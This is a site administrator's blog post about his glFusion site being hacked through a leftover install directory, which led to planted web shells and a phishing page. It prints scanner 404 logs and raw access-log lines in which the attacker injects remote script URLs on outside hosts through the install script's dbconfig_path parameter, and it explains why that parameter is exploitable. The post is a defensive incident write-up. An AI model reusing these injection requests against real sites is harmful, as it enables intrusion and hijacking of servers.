Forgotten Update Leads to Compromised Site

OK - it was my fault, I admit it and I'll take my licks.

I was in the midst of doing a number of site updates of glFusion and got distracted midway through one of my own sites - and left the installation directory in place for over a month. No wonder the site was hacked. I should know better and now I ensure that this tool repository is removed no matter what, and that permissions are changed and things tidied up before I let myself get pulled away.

I've informed the glFusion support as well as SANS - and dumped a copy of the code on them. It turned out to be a couple of fairly well known tools, c99shell and fx29shell - with their names changed to css.php and cyber.php respectively.

I twigged to the exploit because the number of emails the hack created to one user at Yahoo got the Yahoo email system hot and bothered, and it slowed down reception of the stream long enough for a timeout message to be generated (4 hours) by the system - and I got the message since I'm the recipient of last resort for all such messages on the server.

That got me looking and I found the hack and disabled it. I spent most of the rest of the day inspecting the machine and documenting the hack - a nice sunny Sunday I'd rather have back thank you.

You may find some nuggets in the rest of the story

I've been seeing the results of scans by robots looking for install setups on various software for years now. I get about 50 emails/day from systems after they've run their nightly log munging and rotations - and yes, I do look at the contents fairly closely.

Sample from one system today:


404 Not Found
       /boutique/install.txt: 2 Time(s)
       /butik/install.txt: 2 Time(s)
       /cart/install.txt: 4 Time(s)
       /catalog/install.txt: 2 Time(s)
       /install.txt: 2 Time(s)
       /shop/install.txt: 2 Time(s)
       /shop2/install.txt: 2 Time(s)
       /store/install.txt: 2 Time(s)
       /zcart/install.txt: 2 Time(s)
       /zen-cart/install.txt: 2 Time(s)
       /zen/install.txt: 2 Time(s)
       /zencart/install.txt: 2 Time(s)


And I even found the log entry from when they got my system - and what they did about it

avail4.atl.gahost.com - - [04/Aug/2009:06:45:27 -0700] "GET //admin/install/index.php?mode='&dbconfig_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 200 16 "-" "Mozilla/5.0"


avail4.atl.gahost.com - - [04/Aug/2009:06:45:27 -0700] "GET //admin/install/index.php?mode='&dbconfig_path=http://www.die-grenzreiter.com/content/download/fx29id2.txt?? HTTP/1.1" 200 383 "-" "Mozilla/5.0"


avail4.atl.gahost.com - - [04/Aug/2009:06:45:28 -0700] "GET //admin/install/index.php?mode='&dbconfig_path=http://www.trustintomorrow.com/ourspaceimages//newswiremedia///pbot.txt?&modez=botz HTTP/1.1" 200 166 "-" "Mozilla/5.0"

Lots more where that came from - and that's why I keep logs pretty much "forever"

You'll note that they used their own database server - this was so they can bypass the authentication in my database. This is one of the major openings in most install programs - they assume you're a good guy and so pretty much allow you to do anything. In this case the install program asks for and uses any mysql database server - using the construct you see in the URL above rather than reading the "real" database from the db-config.php file as the rest of the system does after install. The install program has to be able to create the db-config.php file and run up to the point where that file is in place and the rest of the system is working correctly, so it will use whatever database you give it on the URL.

After that it was grepping through log files looking for anything else that referenced the css.php and/or cyber.php files that were injected into my /images/library area - which has to be writeable since it is where the glFusion system puts images you're going to upload for your stories.

The hacker in this case knows enough about Geeklog/glFusion to know where to write stuff - but I'm guessing they really don't know much more, or simply didn't get time. The original compromise happened a full month before the rest of the hack took place and a bank phishing site was uploaded to my machine and became active. It was only active for a few hours but in that time there were quite a few responses that hit the phishing HTML area. I'm hoping it was mostly "haha fooled you" kinds of responses rather than real people entering their account information. I've seen the output from another hack of simlilar nature that put the results into a file instead of emailing them out real-time as this one did, and most of the information was obviously bogus. But some of it sure looked real to me and likely represented a number of soon-to-be very annoyed people.

The bottom line is that in this case I was lucky. I caught on soon, the rest of the computer has not been touched, and this was the only one of the many sites I administer that got caught. With a bit more time I'm guessing that this hacker could have done quite a bit more damage both to my machine and my reputation - as the URL for all the phishing has one of my domains in it.

So... ensure you don't leave the install stuff around - and better yet, if you have the ability to change the directory names of some or all of a software's active bits it sure makes sense to. This "security by obscurity" is not truly secure, but with the hackers mostly going for the "log hanging fruit" of standard installation paths the chances are that your site will not be touched, even if you don't lock it down much better than I did.

Note: I've received a follow up from Mark at glFusion telling me some of the things he's doing to lock down the install process in case it is left in place as I did. There are all manner of things we've discussed and I feel sure that these will make it much tougher in the future to compromise a system this way - but it is still a great idea to get rid of the install stuff anyway.

Tag: glfusion install hack malware